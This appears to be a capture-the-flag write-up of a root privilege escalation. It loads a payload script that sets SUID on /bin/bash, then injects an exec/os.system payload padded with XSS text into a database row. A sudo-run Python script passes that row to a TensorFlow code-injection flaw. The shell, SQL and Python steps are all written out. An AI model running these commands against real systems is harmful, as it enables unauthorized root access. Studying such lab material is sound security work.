For root:
First, open two SSH sessions.
Create a script at /dev/shm/lol.sh, something like this:
#!/bin/bash
chmod +s /bin/bash
Don't forget to make it executable (chmod +x).
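Putting the setup together, it's two commands (same path and contents as above):

```shell
# Drop the payload script; when root runs it, /bin/bash gets the SUID bit
cat > /dev/shm/lol.sh <<'EOF'
#!/bin/bash
chmod +s /bin/bash
EOF

# Make it executable, otherwise the os.system() call can't run it
chmod +x /dev/shm/lol.sh
```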
Read the database credentials from /opt/security/ml_security.py, log in to the database, and run:
use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
Then, on the second session, run:
sudo /opt/security/ml_security.py
and /dev/shm/lol.sh should get executed by root.
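Once the script has run as root, /bin/bash carries the SUID bit; `-p` tells bash to keep the effective UID instead of dropping it back to your own:

```shell
# -p prevents bash from resetting euid to your real uid
/bin/bash -p -c 'id'
# On the box this should report euid=0(root)
```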
A short explanation:
The Python script checks the entries in the escalate table for XSS using a machine-learning model. Entries that score higher than 0.5 get passed to the preprocess_input_exprs_arg_string function, which is vulnerable to code injection in TensorFlow < 2.6.4 (the box runs 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc
Hence all the XSS-looking content in the print() string: it pushes the score above 0.5 so the payload reaches the vulnerable function.
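A rough, self-contained model of the bug (a simplified stand-in for TensorFlow's helper, not its real code): the function splits each `key=expr` pair and passes the right-hand side to eval(), so wrapping the payload in exec(...) runs arbitrary statements:

```shell
python3 - <<'PY'
# Simplified sketch of the vulnerable helper (assumption: TF < 2.6.4
# eval()s the right-hand side of each key=expr pair unsanitized).
def preprocess_input_exprs_arg_string(exprs):
    out = {}
    for pair in exprs.split(';'):
        key, expr = pair.split('=', 1)
        out[key] = eval(expr)  # the injection point
    return out

# eval() of an exec("...") string executes the embedded statements --
# in the real payload, the os.system("/dev/shm/lol.sh") call.
preprocess_input_exprs_arg_string('hello=exec("print(\'code ran\')")')
PY
```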